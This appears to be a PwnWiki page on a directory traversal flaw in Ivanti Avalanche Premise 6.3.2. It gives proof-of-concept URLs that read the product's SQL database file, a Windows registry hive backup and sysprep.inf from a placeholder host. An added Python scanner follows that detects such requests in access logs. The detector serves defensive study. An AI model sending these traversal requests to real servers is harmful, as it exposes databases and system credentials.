Ivanti Avalanche Directory Traversal Vulnerability

From PwnWiki
Revision as of 10:31, 22 May 2021 by Pwnwiki

Affected versions

Avalanche Premise 6.3.2 for Windows v6.3.2.3490

POC

Database read:
https://EXAMPLE_IP:8443/AvalancheWeb/image?imageFilePath=C:/Program Files/Microsoft SQL Server/MSSQL11.SQLEXPRESS/MSSQL/DATA/Avalanche.mdf

Other:
https://EXAMPLE_IP:8443/AvalancheWeb/image?imageFilePath=C:/Windows/system32/config/system.sav
https://EXAMPLE_IP:8443/AvalancheWeb/image?imageFilePath=C:/sysprep/sysprep.inf
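
A log check for the request pattern listed above, as an added example that is not part of the original page: it scans web access-log lines for `/AvalancheWeb/image` requests whose `imageFilePath` value decodes to an absolute or `..` path. The combined-style log format, the heuristic for what counts as suspicious, and the sample lines (including the benign `logo.png` value) are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

ENDPOINT = "/avalancheweb/image"  # endpoint used by the PoC URLs on this page
PARAM = "imagefilepath"           # parameter used by the PoC URLs on this page

# Assumption: combined/Tomcat-style access log with a quoted request line.
REQUEST_RE = re.compile(r'"(?:GET|HEAD|POST) (\S+) HTTP/[\d.]+"')
# Heuristic (assumption): a drive-letter or rooted/UNC path, or a ".." segment,
# is not a legitimate image reference.
SUSPICIOUS_RE = re.compile(r'^(?:[A-Za-z]:|[\\/])|(?:^|[\\/])\.\.(?:[\\/]|$)')

def fully_decode(value, rounds=3):
    """Undo nested URL-encoding (e.g. %252F) so encoded paths still match."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan(lines):
    """Return (line_number, decoded_path) for each suspicious request."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if fully_decode(target.path).lower().rstrip("/") != ENDPOINT:
            continue
        for key, values in parse_qs(target.query, keep_blank_values=True).items():
            if key.lower() != PARAM:
                continue
            for value in values:
                path = fully_decode(value)
                if SUSPICIOUS_RE.search(path):
                    hits.append((number, path))
    return hits

# Constructed sample log lines (documentation IP range), not real traffic.
SAMPLE_LOG = [
    '192.0.2.10 - - [22/May/2021:10:31:00 +0000] "GET /AvalancheWeb/image?imageFilePath=C:/Windows/system32/config/system.sav HTTP/1.1" 200 512',
    '192.0.2.11 - - [22/May/2021:10:31:05 +0000] "GET /AvalancheWeb/image?imageFilePath=logo.png HTTP/1.1" 200 2048',
    '192.0.2.10 - - [22/May/2021:10:31:09 +0000] "GET /AvalancheWeb/image?imageFilePath=C%253A%252Fsysprep%252Fsysprep.inf HTTP/1.1" 200 733',
    '192.0.2.12 - - [22/May/2021:10:31:12 +0000] "GET /index.html HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for number, path in scan(SAMPLE_LOG):
        print(f"line {number}: imageFilePath -> {path}")
```

Hits on hosts running the affected version should be followed up by checking whether the response status and size indicate the file was actually returned.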